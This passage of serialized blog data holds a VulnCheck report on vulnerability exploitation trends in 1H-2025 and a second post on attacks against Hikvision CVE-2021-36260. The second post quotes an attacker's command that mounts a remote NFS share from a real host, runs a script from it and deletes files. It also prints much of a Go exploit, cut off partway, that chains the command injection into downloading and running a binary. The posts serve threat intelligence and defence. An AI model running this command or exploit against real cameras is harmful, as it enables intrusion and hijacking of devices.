enough","ZDNet","https:\u002F\u002Fwww.zdnet.com\u002Farticle\u002Fthe-patching-treadmill-why-traditional-application-security-is-no-longer-enough\u002F","2026-05-11",{"title":37277,"source":37282,"link":37283,"date":2952},"Spiceworks","https:\u002F\u002Fwww.spiceworks.com\u002Fsecurity\u002Fthe-patching-treadmill-why-traditional-application-security-is-no-longer-enough\u002F",[37285],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":37287,"toc":37548},[37288,37293,37297,37300,37304,37324,37328,37333,37348,37352,37356,37359,37376,37379,37382,37399,37403,37409,37417,37426,37430,37433,37442,37446,37452,37455,37459,37464,37467,37471,37476,37479,37494,37503,37506,37510,37516,37519,37523,37526,37528,37531,37534,37537,37539,37541,37543],[18,37289,37290],{},[68,37291],{":width":10862,"alt":19511,"src":37292},"\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002F1h-2025-categories.png",[1920,37294,37296],{"id":37295},"a-look-into-1h-2025-vulnerability-exploitation","A look into 1H-2025 Vulnerability Exploitation",[18,37298,37299],{},"In the first half of 2025, VulnCheck identified 432 CVEs with evidence of exploitation in the wild for the first time. Known exploited vulnerabilities were disclosed by 82 distinct sources. We continue to see vulnerabilities being exploited at a fast pace with 32.1% of vulnerabilities being exploited on or before the day of the CVE disclosure, often representing zero-day exploitation. This demonstrates the need for defenders to move quickly on emerging threats while continuing to burn down their vulnerability debt.",[61,37301,37303],{"id":37302},"here-are-the-key-takeaways-from-our-analysis-and-coverage-of-known-exploited-vulnerabilities","Here are the key takeaways from our analysis and coverage of known exploited vulnerabilities",[22,37305,37306,37309,37312,37315,37318,37321],{},[25,37307,37308],{},"432 CVEs were reported as being exploited for the first time and added to VulnCheck KEV in 1H-2025",[25,37310,37311],{},"32.1% of KEVs had exploitation evidence on or before the day the CVE was issued, an increase from 23.6% in 2024.",[25,37313,37314],{},"Reported exploitation attributed to threat actors in China and North Korea decreased while exploitation attributed to Russia and Iran threat actors increased.",[25,37316,37317],{},"26.9% of KEVs first seen in the 1H-2025 were still awaiting analysis by NIST",[25,37319,37320],{},"While Open Source Software is impacted by a growing number of exploited vulnerabilities, our research shows that proprietary software such as CMS platforms and plug-ins, network edge devices, and server software are larger contributors to mass exploitation - not necessarily open source software.",[25,37322,37323],{},"147 of 181 unique CVEs that were used by known threat actors\nhad evidence of exploitation prior to 2025, demonstrating that threat actor exploitation disclosure often lags behind disclosure of initial exploitation evidence.",[61,37325,37327],{"id":37326},"how-quickly-are-vulnerabilities-being-exploited","How Quickly are Vulnerabilities Being Exploited?",[18,37329,37330],{},[68,37331],{":width":10862,"alt":19511,"src":37332},"\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002F1H-2025-speed.png",[18,37334,37335,37336,37341,37342,37347],{},"When we examine the time from CVE disclosure to exploitation evidence, we gain a better understanding of how quickly vulnerabilities are being exploited. We observed an 8.5% increase in the percentage of KEVs that had exploitation evidence disclosed on or before the day a CVE was published (32.1% in 1H-2025 as compared to the ",[47,37337,37340],{"href":37338,"rel":37339},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002F2024-exploitation-trends#how-quickly-are-vulnerabilities-being-exploited",[51],"23.6% we reported in 2024",". There are several nuances to consider. Additional evidence sourced from 2024 has increased this percentage over time, which is more aligned with what we are seeing in the 1H-2025. In addition, VulnCheck also issued ",[47,37343,37346],{"href":37344,"rel":37345},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fkev-expansion-2025",[51],"32+ CVEs"," for vulnerabilities after auditing Shadowserver in June, where there was evidence of exploitation but no CVE had been assigned, as we work to provide broader visibility for defenders through our contributions to the CVE program as a CVE numbering authority.",[61,37349,37351],{"id":37350},"exploring-categories-and-technologies","Exploring Categories and Technologies",[18,37353,37354],{},[68,37355],{":width":10862,"alt":19511,"src":37292},[18,37357,37358],{},"Five KEV categories continue to top the list for the 1H-2025, including:",[22,37360,37361,37364,37367,37370,37373],{},[25,37362,37363],{},"Content Management Systems (86) - A significant volume of this can be attributed to Wordpress Plug-ins 🙄",[25,37365,37366],{},"Network Edge Devices (77)",[25,37368,37369],{},"Server Software (61)",[25,37371,37372],{},"Open Source Software (55)",[25,37374,37375],{},"Operating Systems (38)",[18,37377,37378],{},"The Hardware category had a notable increase in KEVs as VulnCheck issued CVEs for several vulnerabilities targeting camera systems, DVRs, and IP phones, among other hardware devices, where exploitation evidence had been identified by Shadow Server.",[18,37380,37381],{},"Vendors with the highest number of KEVs in the 1H2025 included:",[22,37383,37384,37387,37390,37393,37396],{},[25,37385,37386],{},"Microsoft (32) - it’s worth noting that 26 of these KEVs are for Windows.",[25,37388,37389],{},"Cisco (10) - several are older vulnerabilities across multiple product lines.",[25,37391,37392],{},"Apple OS (6)",[25,37394,37395],{},"Totolink Networking Devices (6)",[25,37397,37398],{},"VMware (6)",[61,37400,37402],{"id":37401},"which-source-first-reported-exploitation","Which source first reported exploitation?",[18,37404,37405],{},[68,37406],{":width":10862,"alt":37407,"src":37408},"1H-2025 Earliest Reporter","\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fearliest-reporter.png",[18,37410,37411,37412,59],{},"Evidence of exploitation for the 432 KEVs added to VulnCheck was first observed across more than 74 unique sources, highlighting the importance of having broad source coverage to ensure the earliest detection of exploitation. A comparison can be seen from the ",[47,37413,37416],{"href":37414,"rel":37415},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fstate-of-exploitation-1h-2024#first-source-to-disclose-known-exploitation",[51],"1H-2024 state of exploitation report",[18,37418,37419,37420,37425],{},"VulnCheck KEV focuses on monitoring more than 500 sources for exploitation evidence and delivers machine-readable access and ",[47,37421,37424],{"href":37422,"rel":37423},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fvulncheck-kev-alerts",[51],"Slack\u002Femail alerting"," to ensure defenders are aware of exploited vulnerabilities as early as possible.",[61,37427,37429],{"id":37428},"exploring-threat-actor-attribution","Exploring Threat Actor Attribution",[18,37431,37432],{},"During 1H-2025, we analyzed and aggregated data from 139 unique industry reports that attributed vulnerability exploitation to threat actors. We identified 181 unique CVEs that were mentioned as being used by one of 92 named threat actors. Of the 181 CVEs, 147 had evidence of exploitation prior to 2025, demonstrating that threat actor exploitation disclosure often lags behind disclosure of initial exploitation evidence.",[18,37434,37435,37436,37441],{},"In February, we took a deep dive into the ",[47,37437,37440],{"href":37438,"rel":37439},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fblack-basta-chats",[51],"Black Basta chat logs",", which offer a more detailed examination of attribution and targeting for an individual threat actor.",[61,37443,37445],{"id":37444},"what-countries-were-most-commonly-attributed-to-threat-actors-in-the-1h-2025","What countries were most commonly attributed to threat actors in the 1H-2025?",[18,37447,37448],{},[68,37449],{":width":10862,"alt":37450,"src":37451},"Threat Actor Country","\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fthreat-actor-country.png",[18,37453,37454],{},"During 1H-2025, 92 unique threat actors were referenced across industry reports, of which 56 (60.8%) have an attributed country. If we look at the threat actors by attributed country, we quickly see that the usual suspects – China (20), Russia (11), North Korea (9), and Iran (6) – have the largest number of active threat actor groups. These countries are known for their cyber espionage and cyber activities, often being referred to as the four horsemen.",[61,37456,37458],{"id":37457},"what-does-vulnerability-attribution-reported-across-all-threat-actors-in-the-1h-2025-look-like","What does vulnerability attribution reported across all threat actors in the 1H-2025 look like?",[18,37460,37461],{},[68,37462],{":width":10862,"alt":37450,"src":37463},"\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fthreat-actor-attribution.png",[18,37465,37466],{},"The following chart provides insight into attribution of unique vulnerabilities to threat actors. It highlights each threat actor, which has been normalized to incorporate the broad number of aliases and attributes the threat actor's country when applicable and the number of unique CVEs attributed in reports during the 1H-2025.",[61,37468,37470],{"id":37469},"what-nation-states-appear-to-be-the-most-active","What nation states appear to be the most active?",[18,37472,37473],{},[68,37474],{":width":10862,"alt":37450,"src":37475},"\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fthreat-actor-activity.png",[18,37477,37478],{},"To provide some insight into which nation states appear to be the most relevant, we explored the number of times a known exploited vulnerability was attributable to the four horsemen (China, Russia, North Korea and Iran). During the 1H-2025, we observed a drop in reports of KEVs associated with China and North Korea while we saw an increase in reports of exploited vulnerabilities associated with Russia and Iran.",[18,37480,37481,37482,37487,37488,37493],{},"The spikes in the 2H-2024 and subsequent drops associated with China and North Korea can largely be attributed to the release of two government reports in the 2H-2024 ",[47,37483,37486],{"href":37484,"rel":37485},"https:\u002F\u002Fmedia.defense.gov\u002F2024\u002FSep\u002F18\u002F2003547016\u002F-1\u002F-1\u002F0\u002FCSA-PRC-LINKED-ACTORS-BOTNET.PDF",[51],"People’s Republic of China-Linked Actors Compromise Routers and IoT Devices for Botnet Operations"," which attributed 66 KEVs to the chinese threat actor Flax Typhoon (AKA Ethereal Panda) and ",[47,37489,37492],{"href":37490,"rel":37491},"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002F2024-07\u002Faa24-207a-dprk-cyber-group-conducts-global-espionage-campaign.pdf",[51],"North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs"," which attributed 44 KEVs to Silent Chollima.",[18,37495,37496,37497,37502],{},"Similarly the 1H-2025 increase in Iran attribution appears to largely tie to the ",[47,37498,37501],{"href":37499,"rel":37500},"https:\u002F\u002Fwww.tenable.com\u002Fblog\u002Ffrequently-asked-questions-about-iranian-cyber-operations",[51],"Frequently Asked Questions About Iranian Cyber Operations"," research released by Tenable which attributes 29 KEVs to Iranian threat actors",[18,37504,37505],{},"The spike in Russian attribution isn’t tied to specific reports and attribution is broadly distributed across sources, which re-emphasizes Russia continues to be a major force behind threat activity and vulnerability exploitation.",[61,37507,37509],{"id":37508},"how-has-nist-nvd-performed-for-known-exploited-vulnerabilities","How Has NIST NVD Performed for Known Exploited Vulnerabilities",[18,37511,37512],{},[68,37513],{":width":10862,"alt":37514,"src":37515},"NIST NVD","\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fnvd-1H-2025.png",[18,37517,37518],{},"When we look at NIST NVD as an enrichment source for CVE records we see that 26.9% of KEVs first seen in the 1H-2025 were still awaiting analysis by NIST. Additionally, 4.4% of the KEVs are in a deferred status, meaning they are no longer maintained or updated by NIST. This highlights the continued challenges we’ve seen with resource challenges at NIST NVD since they lost funding in February 2024.",[61,37520,37522],{"id":37521},"summary-of-vulncheck-1h-2025-exploit-intelligence-report","Summary of VulnCheck 1H-2025 Exploit Intelligence Report",[18,37524,37525],{},"The first half of 2025 highlights how quickly vulnerabilities are weaponized and the growing sophistication of global threat actors. With over 430 new KEVs, persistence in what appears to be zero-day exploitation, and shifting nation-state activity, defenders face an increasingly compressed timeline for response. Continued focus on timely vulnerability management, proactive intelligence, and broad exploitation monitoring remains essential to staying ahead of adversaries.",[61,37527,19715],{"id":19714},[18,37529,37530],{},"[1] VulnCheck onboarded Crowdsec as a new intel source for KEVs prior to this reports cut off resulting in a significant contribution to the volume of KEVs reported.",[18,37532,37533],{},"[2] VulnCheck generated CVEs for 30+ vulnerabilties with exploitation activity in ShadowServer that did not previously have a CVE which contributed to volume and speed increases.",[18,37535,37536],{},"[3] For Threat Actor attribution we are using publicly reported instances of threat actor attribution which are likely to have some level of bias.",[61,37538,202],{"id":201},[18,37540,205],{},[18,37542,208],{},[18,37544,211,37545,217],{},[47,37546,216],{"href":214,"rel":37547},[51],{"title":219,"searchDepth":220,"depth":220,"links":37549},[37550,37551,37552,37553,37554,37555,37556,37557,37558,37559,37560,37561],{"id":37302,"depth":220,"text":37303},{"id":37326,"depth":220,"text":37327},{"id":37350,"depth":220,"text":37351},{"id":37401,"depth":220,"text":37402},{"id":37428,"depth":220,"text":37429},{"id":37444,"depth":220,"text":37445},{"id":37457,"depth":220,"text":37458},{"id":37469,"depth":220,"text":37470},{"id":37508,"depth":220,"text":37509},{"id":37521,"depth":220,"text":37522},{"id":19714,"depth":220,"text":19715},{"id":201,"depth":220,"text":202},"A Look into the Last 6-months of Vulnerability Exploitation… January-June 2025",{"slug":37564},"state-of-exploitation-1h-2025","\u002Fblog\u002Fstate-of-exploitation-1h-2025",{"title":37239,"description":37562},"blog\u002Fstate-of-exploitation-1h-2025",[1280,1279],"VpZD-43r36Lf_efzVoCdtiMT2-dslGjZjlKY9fdz9qQ",{"id":37571,"title":35917,"articles":7,"authors":37572,"body":37574,"date":39548,"description":39549,"extension":234,"image":7,"link":7,"meta":39550,"navigation":237,"path":39552,"seo":39553,"series":7,"stem":39554,"subtype":7,"tags":39555,"__hash__":39556},"blog\u002Fblog\u002Fhikvision-mount-shell.md",[37573],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":37575,"toc":39542},[37576,37579,37581,37600,37606,37636,37643,37649,37697,37704,37713,37738,37748,37754,37779,37782,37788,37791,37795,37818,38819,38822,38833,38853,38859,38868,38871,38886,38892,39193,39201,39205,39212,39215,39221,39235,39241,39248,39261,39267,39271,39277,39297,39300,39304,39309,39313,39330,39334,39356,39358,39374,39388,39390,39392,39539],[263,37577],{":list":37578,"ico":266,"title":20},"[\"VulnCheck observed an attacker in the wild using `mount` as a “download and execute” GTFOBin while attempting to exploit Hikvision CVE-2021-36260.\",\"This novel use of `mount` was added to the binary dropper payloads in VulnCheck’s go-exploit framework.\",\"VulnCheck provides infrastructure details related to the attacker’s activity.\"]",[1920,37580,11648],{"id":11647},[18,37582,37583,37588,37589,37592,37593,37595,37596,37599],{},[47,37584,37587],{"href":37585,"rel":37586},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2021-36260",[51],"CVE-2021-36260"," is still ",[1131,37590,37591],{},"very"," viable. Shodan shows over one million potentially vulnerable internet-facing targets",[47,37594,467],{"href":36220},", many with ",[886,37597,37598],{},"Last-Modified"," headers dating back to the last decade.",[18,37601,37602],{},[68,37603],{":width":10862,"alt":37604,"src":37605},"Hikvision systems on Shodan","\u002Fblog\u002Fhikvision-mount-shell\u002Fhikvision-shodan.png",[18,37607,37608,37609,37612,37613,37615,37616,37620,982,37622,37627,37629,37630,37632,37633,37635],{},"These systems are ideal for internal pivots or building proxy networks, which makes it unsurprising that ",[47,37610,37587],{"href":37585,"rel":37611},[51]," regularly appears in joint cybersecurity advisories",[47,37614,353],{"href":36233}," and is associated with advanced threat actors like ",[47,37617,37062],{"href":37618,"rel":37619},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Fethereal%20panda",[51],[47,37621,491],{"href":36482},[47,37623,37626],{"href":37624,"rel":37625},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Ffancy%20bear",[51],"Fancy Bear",[47,37628,380],{"href":36486},". The GreyNoise tag",[47,37631,401],{"href":36490}," is consistently active, and Shadowserver observes exploitation attempts daily",[47,37634,356],{"href":36536},". Shockingly (or not), attackers like useful systems.",[18,37637,37638,37639,37642],{},"Given all that, when our canaries are hit with ",[47,37640,37587],{"href":37585,"rel":37641},[51]," exploit attempts, it doesn’t exactly move the excitement needle. However, one recent attempt did catch our attention.",[18,37644,37645],{},[68,37646],{":width":10862,"alt":37647,"src":37648},"Hikvision exploit attempt in the wild","\u002Fblog\u002Fhikvision-mount-shell\u002Fexploit-attempt.png",[18,37650,37651,37654,37655,37658,37659,37662,37663,1246,37665,1246,37667,1255,37670,37673,37674,37677,37678,37682,37683,37686,37687,37690,37691,982,37693,37696],{},[47,37652,37587],{"href":37585,"rel":37653},[51]," is a command injection vulnerability affecting the ",[886,37656,37657],{},"\u002FSDK\u002FwebLanguage"," endpoint. Typically, attackers will use this endpoint to drop a malicious binary and execute it. However, this Hikvision system doesn’t have any of the classic GTFOBins",[47,37660,423],{"href":37661},"#user-content-fn-7"," to download a remote file (e.g. ",[886,37664,1557],{},[886,37666,1553],{},[886,37668,37669],{},"tftp",[886,37671,37672],{},"openssl"," are all missing. ",[886,37675,37676],{},"scp"," is broken). Attackers need to be creative. Metasploit",[47,37679,37681],{"href":37680},"#user-content-fn-8","8"," uses ",[886,37684,37685],{},"printf"," to write the Meterpreter stager to disk in 20ish byte chunks (each exploit attempt must fit within a 26 byte buffer), which is quite slow. VulnCheck’s ",[47,37688,1245],{"href":1243,"rel":37689},[51]," implementation sidesteps this issue by dropping a shell script that creates a reverse shell using ",[886,37692,1055],{},[886,37694,37695],{},"mknod",", but that’s hardly as powerful as Meterpreter.",[18,37698,37699,37700,37703],{},"All that is to say, if you want to drop a binary by exploiting ",[47,37701,37587],{"href":37585,"rel":37702},[51]," then you have to do a little work. That is why we appreciated the attacker’s exploit attempt shown above. It used a technique we hadn’t seen before as an initial binary dropper. This attacker leveraged the command injection to mount a remote NFS share and executed a file off of it.",[1354,37705,37707],{"className":34366,"code":37706,"language":34368,"meta":219,"style":219},"$(mkdir b; mount -o intr,nolock,tcp,exec 87.121.84[.]34:\u002Fsrv\u002Fnfs\u002Fshared b; cd b; chmod 777 *;sh hik.sh;cd ..\u002F;rm -rf weblib\u002F;rm -rf b)\n",[886,37708,37709],{"__ignoreMap":219},[1373,37710,37711],{"class":1375,"line":1376},[1373,37712,37706],{"class":9383},[18,37714,37715,37716,37720,37721,37723,37724,37727,37728,37730,37731,37734,37735,59],{},"The official GTFOBin ",[47,37717,22271],{"href":37718,"rel":37719},"https:\u002F\u002Fgtfobins.github.io\u002F",[51]," doesn’t have a “file download” attribute for the ",[886,37722,16339],{}," binary",[47,37725,723],{"href":37726},"#user-content-fn-9","; it’s only documented as a privilege escalation GTFOBin, but it is useful in this new (maybe obvious) capacity. In the command above, the attacker tells ",[886,37729,16339],{}," to make the remote NFS share, ",[886,37732,37733],{},"\u002Fsrv\u002Fnfs\u002Fshared",", on 87.121.84[.]34 available locally as the directory ",[886,37736,37737],{},".\u002Fb",[18,37739,37740,37741,37743,37744,37747],{},"To do this, ",[886,37742,16339],{}," first contacts the remote port mapper",[47,37745,24698],{"href":37746},"#user-content-fn-10"," (tcp\u002F111 or udp\u002F111) to discover the NFS service port, then mounts the directory using NFS (tcp\u002F2049 by default).",[18,37749,37750],{},[68,37751],{":width":10862,"alt":37752,"src":37753},"Mount network flow","\u002Fblog\u002Fhikvision-mount-shell\u002Fmount-graph.png",[18,37755,37756,37757,37759,37760,37763,1554,37767,37770,37773,37774,982,37776,37778],{},"This technique neatly sidesteps the problem Metasploit has (creating a file by using ",[886,37758,37685],{}," in small chunks is very slow), and avoids relying on a reverse shell to drop a binary as our exploit does. Additionally, this technique benefits from avoiding common network signatures, such as ",[1131,37761,37762],{},"TGI HUNT Curl to Bare IP Address",[47,37764,37766],{"href":37765},"#user-content-fn-11","11",[1131,37768,37769],{},"ET POLICY curl User-Agent Outbound",[47,37771,377],{"href":37772},"#user-content-fn-12"," that look for ",[886,37775,1553],{},[886,37777,1557],{}," on the network.",[18,37780,37781],{},"Below you can see how this attack would look if it were successful. The Wireshark traffic transitions from HTTP, to PortMap, to NFS.",[18,37783,37784],{},[68,37785],{":width":10862,"alt":37786,"src":37787},"Mount attack in Wireshark","\u002Fblog\u002Fhikvision-mount-shell\u002Fwireshark-exploit-with-mount.png",[18,37789,37790],{},"Overall, it’s a great little GTFOBin when options are limited. While server setup is a bit more involved than one might like, the technique benefits from being less common, and thus, less likely to trigger existing detections.",[1920,37792,37794],{"id":37793},"adding-the-technique-to-go-exploit","Adding the Technique to go-exploit",[18,37796,37797,37798,37801,37802,37807,37808,37810,37811,37814,37815,37817],{},"We found this technique useful enough to update VulnCheck’s open-source exploit framework, ",[47,37799,20558],{"href":14297,"rel":37800},[51],", to include a new binary dropper payload that ",[47,37803,37806],{"href":37804,"rel":37805},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F88ae33821ce659c3c42af0f4a9d864bb7e42861a\u002Fpayload\u002Fdropper\u002Funix.go#L64",[51],"implements"," this ",[886,37809,16339],{},"-based attack. Since we always strive to think and act like real attackers, we also developed a new variant of our ",[47,37812,37587],{"href":37585,"rel":37813},[51]," exploit for our customers that uses ",[886,37816,16339],{},". Because this is somewhat novel, we’re sharing most of the exploit implementation here:",[1354,37819,37821],{"className":19022,"code":37820,"language":19024,"meta":219,"style":219},"\u002F\u002F Send the exploit payload in the required HTTP PUT\nfunc send(url string, payload string) bool {\n resp, bodyString, ok := protocol.HTTPSendAndRecv(\"PUT\", url, payload)\n if !ok {\n return false\n }\n\n if resp.StatusCode != 200 && resp.StatusCode != 500 {\n output.PrintfError(\"Received an unexpected HTTP status code: %d\", resp.StatusCode)\n return false\n }\n\n if !strings.Contains(bodyString, \"\u003CrequestURL>\u002FSDK\u002FwebLanguage\u003C\u002FrequestURL>\") {\n output.PrintfError(\"Received an unexpected HTTP body: %s\", bodyString)\n return false\n }\n\n return true\n}\n\nfunc (sploit HikvisionExploitMount) RunExploit(conf *config.Config) bool {\n url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, \"\u002FSDK\u002FwebLanguage\")\n\n switch conf.C2Type {\n case c2.SimpleShellServer:\n output.PrintfStatus(\"Sending a reverse shell payload for %s:%d\", conf.Lhost, conf.Lport)\n\n \u002F\u002F generate a random directory to mount to\n randDir := random.RandLetters(3)\n mountCommand := dropper.Unix.Mountv3Only(conf.Lhost, conf.GetStringFlag(\"share\"), \".\u002F\"+randDir)\n\n \u002F\u002F split the exploit into 7 byte chunks that we can append to a local script\n mountSplit := splitByByteSize(mountCommand, 7)\n\n \u002F\u002F the exploit space is very small (23 bytes) so break it up over multiple\n \u002F\u002F requests. This will echo to a hard-coded filename (y).\n if ok := send((url, \"\u003Cxml>\u003Clanguage >$(mkdir \"+randDir+\")\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n return false\n }\n for i, entry := range mountSplit {\n \u002F\u002F on the first exploit attempt, overwrite anything that might be in `y`\n shAppend := \">>\"\n if i == 0 {\n shAppend = \">\"\n }\n if ok := send((url, \"\u003Cxml>\u003Clanguage >$(echo -n '\"+entry+\"'\"+shAppend+\"y)\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n return false\n }\n }\n\n \u002F\u002F execute the script\n if ok := send((url, \"\u003Cxml>\u003Clanguage >$(chmod +x y)\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n return false\n }\n if ok := send((url, \"\u003Cxml>\u003Clanguage >$(.\u002Fy)\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n return false\n }\n\n \u002F\u002F execute the mounted binary\n if ok := send((url, \"\u003Cxml>\u003Clanguage >$(.\u002F\"+randDir+\"\u002F\"+conf.GetStringFlag(\"exploit\")+\n \")\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n return false\n }\n default:\n output.PrintError(\"Invalid payload\")\n return false\n }\n\n return true\n}\n",[886,37822,37823,37828,37854,37897,37907,37913,37917,37921,37952,37986,37992,37996,38000,38031,38057,38063,38067,38071,38078,38082,38086,38124,38174,38178,38192,38207,38251,38255,38260,38281,38343,38347,38352,38374,38378,38383,38388,38432,38438,38442,38465,38470,38483,38496,38509,38513,38571,38578,38582,38586,38590,38595,38626,38632,38636,38667,38673,38677,38681,38686,38742,38759,38765,38769,38776,38795,38801,38805,38809,38815],{"__ignoreMap":219},[1373,37824,37825],{"class":1375,"line":1376},[1373,37826,37827],{"class":4630},"\u002F\u002F Send the exploit payload in the required HTTP PUT\n",[1373,37829,37830,37832,37835,37837,37839,37841,37843,37846,37848,37850,37852],{"class":1375,"line":220},[1373,37831,19088],{"class":1397},[1373,37833,37834],{"class":7297}," send",[1373,37836,1384],{"class":1383},[1373,37838,7585],{"class":19096},[1373,37840,15757],{"class":7293},[1373,37842,5437],{"class":1383},[1373,37844,37845],{"class":19096}," payload",[1373,37847,15757],{"class":7293},[1373,37849,2230],{"class":1383},[1373,37851,16303],{"class":7293},[1373,37853,4765],{"class":1383},[1373,37855,37856,37859,37861,37864,37866,37868,37870,37872,37874,37877,37879,37881,37884,37886,37888,37891,37893,37895],{"class":1375,"line":1266},[1373,37857,37858],{"class":4640}," resp",[1373,37860,5437],{"class":1383},[1373,37862,37863],{"class":4640}," bodyString",[1373,37865,5437],{"class":1383},[1373,37867,20610],{"class":4640},[1373,37869,20584],{"class":1397},[1373,37871,20615],{"class":4640},[1373,37873,59],{"class":1383},[1373,37875,37876],{"class":7297},"HTTPSendAndRecv",[1373,37878,1384],{"class":1383},[1373,37880,183],{"class":1387},[1373,37882,37883],{"class":1391},"PUT",[1373,37885,183],{"class":1387},[1373,37887,5437],{"class":1383},[1373,37889,37890],{"class":4640}," url",[1373,37892,5437],{"class":1383},[1373,37894,37845],{"class":4640},[1373,37896,11875],{"class":1383},[1373,37898,37899,37901,37903,37905],{"class":1375,"line":1852},[1373,37900,4695],{"class":4636},[1373,37902,7370],{"class":1397},[1373,37904,20662],{"class":4640},[1373,37906,8904],{"class":1383},[1373,37908,37909,37911],{"class":1375,"line":4692},[1373,37910,4918],{"class":4636},[1373,37912,16195],{"class":14985},[1373,37914,37915],{"class":1375,"line":4724},[1373,37916,4795],{"class":1383},[1373,37918,37919],{"class":1375,"line":4756},[1373,37920,6520],{"emptyLinePlaceholder":237},[1373,37922,37923,37925,37928,37930,37933,37935,37937,37939,37941,37943,37945,37947,37950],{"class":1375,"line":4768},[1373,37924,4695],{"class":4636},[1373,37926,37927],{"class":4640}," resp",[1373,37929,59],{"class":1383},[1373,37931,37932],{"class":4640},"StatusCode ",[1373,37934,15677],{"class":1397},[1373,37936,6610],{"class":5467},[1373,37938,16622],{"class":1397},[1373,37940,37927],{"class":4640},[1373,37942,59],{"class":1383},[1373,37944,37932],{"class":4640},[1373,37946,15677],{"class":1397},[1373,37948,37949],{"class":5467}," 500",[1373,37951,4765],{"class":1383},[1373,37953,37954,37957,37959,37962,37964,37966,37969,37973,37975,37977,37979,37981,37984],{"class":1375,"line":4792},[1373,37955,37956],{"class":4640}," output",[1373,37958,59],{"class":1383},[1373,37960,37961],{"class":7297},"PrintfError",[1373,37963,1384],{"class":1383},[1373,37965,183],{"class":1387},[1373,37967,37968],{"class":1391},"Received an unexpected HTTP status code: ",[1373,37970,37972],{"class":37971},"sYoWi","%d",[1373,37974,183],{"class":1387},[1373,37976,5437],{"class":1383},[1373,37978,37927],{"class":4640},[1373,37980,59],{"class":1383},[1373,37982,37983],{"class":4640},"StatusCode",[1373,37985,11875],{"class":1383},[1373,37987,37988,37990],{"class":1375,"line":4798},[1373,37989,4918],{"class":4636},[1373,37991,16195],{"class":14985},[1373,37993,37994],{"class":1375,"line":4806},[1373,37995,4795],{"class":1383},[1373,37997,37998],{"class":1375,"line":4817},[1373,37999,6520],{"emptyLinePlaceholder":237},[1373,38001,38002,38004,38006,38009,38011,38013,38015,38018,38020,38022,38025,38027,38029],{"class":1375,"line":4825},[1373,38003,4695],{"class":4636},[1373,38005,7370],{"class":1397},[1373,38007,38008],{"class":4640},"strings",[1373,38010,59],{"class":1383},[1373,38012,17107],{"class":7297},[1373,38014,1384],{"class":1383},[1373,38016,38017],{"class":4640},"bodyString",[1373,38019,5437],{"class":1383},[1373,38021,4883],{"class":1387},[1373,38023,38024],{"class":1391},"\u003CrequestURL>\u002FSDK\u002FwebLanguage\u003C\u002FrequestURL>",[1373,38026,183],{"class":1387},[1373,38028,2230],{"class":1383},[1373,38030,4765],{"class":1383},[1373,38032,38033,38035,38037,38039,38041,38043,38046,38049,38051,38053,38055],{"class":1375,"line":4835},[1373,38034,37956],{"class":4640},[1373,38036,59],{"class":1383},[1373,38038,37961],{"class":7297},[1373,38040,1384],{"class":1383},[1373,38042,183],{"class":1387},[1373,38044,38045],{"class":1391},"Received an unexpected HTTP body: ",[1373,38047,38048],{"class":37971},"%s",[1373,38050,183],{"class":1387},[1373,38052,5437],{"class":1383},[1373,38054,37863],{"class":4640},[1373,38056,11875],{"class":1383},[1373,38058,38059,38061],{"class":1375,"line":4843},[1373,38060,4918],{"class":4636},[1373,38062,16195],{"class":14985},[1373,38064,38065],{"class":1375,"line":4849},[1373,38066,4795],{"class":1383},[1373,38068,38069],{"class":1375,"line":4877},[1373,38070,6520],{"emptyLinePlaceholder":237},[1373,38072,38073,38075],{"class":1375,"line":4915},[1373,38074,7340],{"class":4636},[1373,38076,38077],{"class":14985}," true\n",[1373,38079,38080],{"class":1375,"line":4931},[1373,38081,1855],{"class":1383},[1373,38083,38084],{"class":1375,"line":4947},[1373,38085,6520],{"emptyLinePlaceholder":237},[1373,38087,38088,38090,38092,38095,38098,38100,38103,38105,38108,38110,38113,38115,38118,38120,38122],{"class":1375,"line":4952},[1373,38089,19088],{"class":1397},[1373,38091,4641],{"class":1383},[1373,38093,38094],{"class":19096},"sploit ",[1373,38096,38097],{"class":14938},"HikvisionExploitMount",[1373,38099,2230],{"class":1383},[1373,38101,38102],{"class":7297}," RunExploit",[1373,38104,1384],{"class":1383},[1373,38106,38107],{"class":19096},"conf",[1373,38109,19113],{"class":1397},[1373,38111,38112],{"class":14938},"config",[1373,38114,59],{"class":1383},[1373,38116,38117],{"class":14938},"Config",[1373,38119,2230],{"class":1383},[1373,38121,16303],{"class":7293},[1373,38123,4765],{"class":1383},[1373,38125,38126,38129,38131,38133,38135,38137,38139,38141,38143,38146,38148,38150,38152,38155,38157,38159,38161,38164,38166,38168,38170,38172],{"class":1375,"line":6776},[1373,38127,38128],{"class":4640}," url 